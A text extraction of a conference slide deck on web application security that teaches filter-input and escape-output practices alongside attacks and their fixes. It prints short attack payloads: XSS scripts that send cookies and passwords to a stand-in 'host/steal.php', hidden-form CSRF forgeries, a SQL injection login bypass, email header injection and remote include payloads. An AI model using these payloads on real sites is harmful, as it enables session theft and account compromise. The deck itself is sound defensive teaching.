Download - Evolution Of Web Security
![Page 1: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/1.jpg)
Evolution ofWeb Security
Chris Shiflett@shiflett • shiflett.org
![Page 2: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/2.jpg)
Who am I?Web developer from Brooklyn, NY, and founding member of Analog, a web design & development co-operative.
![Page 3: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/3.jpg)
1. Fundamentals
![Page 4: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/4.jpg)
Defense in depth— Redundant safeguards are valuable.
Least privilege— Grant as little freedom as possible.
Least complicated— Complexity breeds mistakes.
Three Principles
![Page 5: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/5.jpg)
Filter input.— Ensure data coming in is valid.
Escape output.— Ensure data going out is not misinterpreted.
Two Practices
![Page 6: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/6.jpg)
Application EscapeFilter
Filter input. Escape output.
![Page 7: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/7.jpg)
<?php
$clean = array();
if (ctype_alpha($_POST['name'])) { $clean['name'] = $_POST['name']; } else { /* Error */}
?>
![Page 8: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/8.jpg)
<?php
$clean = array();
switch ($_POST['color']) { case 'red': case 'green': case 'blue': $clean['color'] = $_POST['color']; break; default: /* Error */ break;}
?>
![Page 9: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/9.jpg)
<?php
$clean = array();
$colors = array('red', 'green', 'blue');
if (in_array($_POST['color'], $colors)) { $clean['color'] = $_POST['color']; } else { /* Error */ }
?>
![Page 10: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/10.jpg)
<?php
$clean = array(); $colors = array();
$colors['red'] = '';$colors['green'] = '';$colors['blue'] = '';
if (isset($colors[$_POST['color']])) { $clean['color'] = $_POST['color']; } else { /* Error */ }
?>
![Page 11: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/11.jpg)
<?php
$clean = array();
if (preg_match('/^\d{5}$/', $_POST['zip'])) { $clean['zip'] = $_POST['zip']; } else { /* Error */ }
?>
![Page 12: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/12.jpg)
<?php
/* Content-Type: text/html; charset=UTF-8' */
$html = array();
$html['user'] = htmlentities($clean['user'], ENT_QUOTES, 'UTF-8');
echo "<p>Welcome, {$html['user']}.</p>";
?>
![Page 13: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/13.jpg)
![Page 14: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/14.jpg)
Cross-Site Scripting
Cross-Site Request Forgeries
SQL Injection
Session Fixation
Session Hijacking
Email Injection
Remote Code Injection
Exploits
![Page 15: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/15.jpg)
VictimAttacker
Cross-Site Scripting
TargetXSSHTML
XSS
1 2
![Page 16: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/16.jpg)
echo $_GET['user'];
http://host/foo.php?user=%3Cscript%3E…
echo '<script>…';
![Page 17: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/17.jpg)
<script>document.location = 'http://host/steal.php?cookies=' + encodeURI(document.cookie);</script>
Steal Cookies
![Page 18: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/18.jpg)
<script>document.forms[0].action ='http://host/steal.php';</script>
Steal Passwords
![Page 19: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/19.jpg)
<form name="steal" action="http://host/steal.php">
<input type="text" name="username" style="display: none" /><input type="password" name="password" style="display: none" />
<input type="image" src="image.png" /></form>
Steal Saved Passwords
![Page 20: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/20.jpg)
<script src="http://host/evil.js"></script>
Short & Simple
![Page 21: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/21.jpg)
$string = "<script>alert('XSS');</script>";$string = mb_convert_encoding($string, 'UTF-7'); echo htmlentities($string);
Character Encoding
Google XSS Examplehttp://shiflett.org/blog/2005/dec/google-xss-example
![Page 22: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/22.jpg)
FIEO.
Use valid HTML.— http://validator.w3.org/
Use existing solutions.— PHP developers, use htmlentities() or htmlspecialchars().— Make sure you indicate the character encoding!
Need to allow HTML?— Use HTML Purifier, even if you’re not using PHP: http://htmlpurifier.org/
Stop It!
![Page 23: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/23.jpg)
TargetAttacker
Cross-Site Request Forgeries
Victim? CSRF
1 2
![Page 24: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/24.jpg)
Because the attack is carried out by the victim, CSRF can bypass:— HTTP auth— Session-based auth— Firewalls— &c.
CSRF
![Page 25: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/25.jpg)
Buy
<form action="buy.php" method="post"><input type="hidden" name="isbn" value="059600656X" /><input type="submit" value="Buy" /></form>
POST /buy.php HTTP/1.1Host: hostCookie: PHPSESSID=1234Content-Type: application/x-www-form-urlencodedContent-Length: 15
isbn=059600656X
![Page 26: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/26.jpg)
Forging GET
GET /buy.php?isbn=059600656X HTTP/1.1Host: hostCookie: PHPSESSID=1234
<img src="http://host/buy.php?isbn=059600656X" />
![Page 27: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/27.jpg)
<iframe style="visibility: hidden" name="secret"></iframe>
<form name="buy" action="http://host/buy.php" method="post" target="secret"><input type="hidden" name="isbn" value="059600656X" /></form>
<script type="text/javascript">document.buy.submit();</script>
Forging POST
POST /buy.php HTTP/1.1Host: hostCookie: PHPSESSID=1234Content-Type: application/x-www-form-urlencodedContent-Length: 15
isbn=059600656X
![Page 28: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/28.jpg)
Digg (Fixed)http://4diggers.blogspot.com/
Amazon (Fixed?)http://shiflett.org/amazon.php
CSRF Exploits
![Page 29: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/29.jpg)
<script>new Image().src = 'http://host/steal.php?cookies=' + encodeURI(document.cookie);</script>
Steal Cookies (Improved)
![Page 30: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/30.jpg)
$token = md5(uniqid(rand(), TRUE));$_SESSION['token'] = $token;$html['token'] = htmlentities($token, ENT_QUOTES, 'UTF-8');
Stop It!
<input type="hidden" name="token" value="<?php echo $html['token']; ?>" />
![Page 31: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/31.jpg)
DatabaseAttacker
SQL Injection
TargetSQLSQL
SQL
1 2
![Page 32: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/32.jpg)
SELECT count(*)FROM usersWHERE username = '{$_POST['username']}'AND password = '…'
chris' /*
SELECT count(*)FROM usersWHERE username = 'chris' /*'AND password = '…'
![Page 33: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/33.jpg)
FIEO.
Use prepared statements.— PHP developers, use PDO.
Stop It!
addslashes() Versus mysql_real_escape_string()http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
![Page 34: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/34.jpg)
http://host/login.php?PHPSESSID=1234
Session Fixation
![Page 35: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/35.jpg)
Regenerate the session identifier.— PHP developers, session_regenerate_id(TRUE).
Do this whenever the privilege level changes.
Stop It!
![Page 36: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/36.jpg)
Attacker impersonates a victim.
In PHP, by default, only requires a valid session identifier.
Session identifier obtained using:— Prediction— Capture— Fixation
Session Hijacking
![Page 37: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/37.jpg)
Understand how sessions work.
Minimize session identifier exposure.— SSL— Separate domain for embedded resources
Trending— https://panopticlick.eff.org/— More on this later…
Stop It!
![Page 38: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/38.jpg)
[email protected]\r\nBcc: [email protected]\r\nBcc: …
To: [email protected]: FeedbackFrom: [email protected]: [email protected]: …
Email Injectionmail('[email protected]', 'Feedback', '...', "From: {$_POST['email']}");
![Page 39: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/39.jpg)
FIEO.— http://iamcal.com/publish/articles/php/parsing_email— PHP developers, use ctype_print() as defense in depth.
Stop It!
![Page 40: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/40.jpg)
TargetAttacker
Remote Code Injection
![Page 41: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/41.jpg)
include "{$_COOKIE['type']}.php";
Cookie: type=http://host/inject.inc?
include "http://host/inject.inc?.php";
![Page 42: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/42.jpg)
This example exploits allow_url_fopen.
PHP 5 has allow_url_include.— By default, allow_url_include is disabled.
Remote Code Injection
![Page 43: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/43.jpg)
include "php://input";
POST /script.php?type=php://input%00 HTTP/1.1Host: hostContent-Type: application/x-www-form-urlencodedContent-Length: ?
?
include "{$_GET['type']}.php";
![Page 44: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/44.jpg)
FIEO.— If at all possible, use a white list.
Stop It!
![Page 45: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/45.jpg)
2. Emerging Trends
![Page 46: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/46.jpg)
Ajax
“The name is shorthand for Asynchronous JavaScript + XML, and it represents a
fundamental shift in what’s possible on the Web.”
— Jesse James Garrett
![Page 47: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/47.jpg)
Ajax
“Client-side techniques & technologies that allow two-way communication
between the client and the server without reloading the page.”
![Page 48: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/48.jpg)
Target
Victim
JS
1. XMLHttpRequest
2. HTML form + victim’s token
3. XMLHttpRequest + victim’s token
Cross-Domain Ajax
![Page 49: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/49.jpg)
Target
Victim
XSS + Ajax + CSRF
XSS
1. XMLHttpRequest
2. HTML form + victim’s token
3. XMLHttpRequest + victim’s token
![Page 50: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/50.jpg)
XSS is a perfect platform for CSRF.
CSRF attacks can exploit XSS vulnerabilities.
Victims can become attackers.
Rinse. Repeat.
Worms
![Page 51: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/51.jpg)
Browser Hijackinghttp://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking
Myspace CSRF and XSS Worm (Samy)http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy
![Page 52: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/52.jpg)
<cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy>
Cross-Domain Ajax
Thanks, Flash!
![Page 53: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/53.jpg)
Cross-Domain Ajax
domain="*" API domain Vulnerable?
No yahoo.com No
No youtube.com No
Yes api.flickr.com No
Yes No adobe.com Yes No
![Page 54: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/54.jpg)
TargetAttacker
JavaScript Hijacking
Victim? CSRF
1 2
34
![Page 55: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/55.jpg)
<script src="http://host/json.php"></script>
[{"email": "[email protected]"}]
JavaScript Hijacking Demohttp://mochikit.com/fortify_fud/
![Page 56: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/56.jpg)
JavaScript Hijacking
“If you audit your application for CSRF flaws, you’ve defeated this attack.
Moreover, the well-known, pre-existing exploits for CSRF are actually worse than
this attack.”
— Thomas Ptacek
![Page 57: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/57.jpg)
3. Ideas for the Future
![Page 58: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/58.jpg)
Panopticlickhttps://panopticlick.eff.org/
Trending
“When you visit a web site, you are allowing that site to access a lot of
information about your computer’s configuration. Combined, this information
can create a kind of fingerprint — a signature that could be used to identify
you and your computer.”
![Page 59: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/59.jpg)
Trending
“Not the intent, but Panopticlick from @eff would be useful for preventing session
hijacking.”
— http://twitter.com/shiflett/status/8562663352
![Page 60: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/60.jpg)
Establish trends to help detect anomalies.
Trends can be based on identity or behavior.
Trending is imperfect; use as defense in depth.
Trending
![Page 61: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/61.jpg)
Security-Centered Design
Webstock 2010
Thursday, 18 FebruaryAfter lunch (13:25)
Illot Theatre
![Page 62: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/62.jpg)
Slides
http://shiflett.org/evolution-of-web-security.pdf
http://slideshare.net/shiflett
![Page 63: Evolution Of Web Security](https://reader038.vdocuments.site/reader038/viewer/2022103111/54c79b614a79595b1f8b4570/html5/thumbnails/63.jpg)
Follow me on Twitter.— @shiflett
Comment on my blog.— shiflett.org
Email me.— [email protected]
Work with me.— analog.coop
Feedback?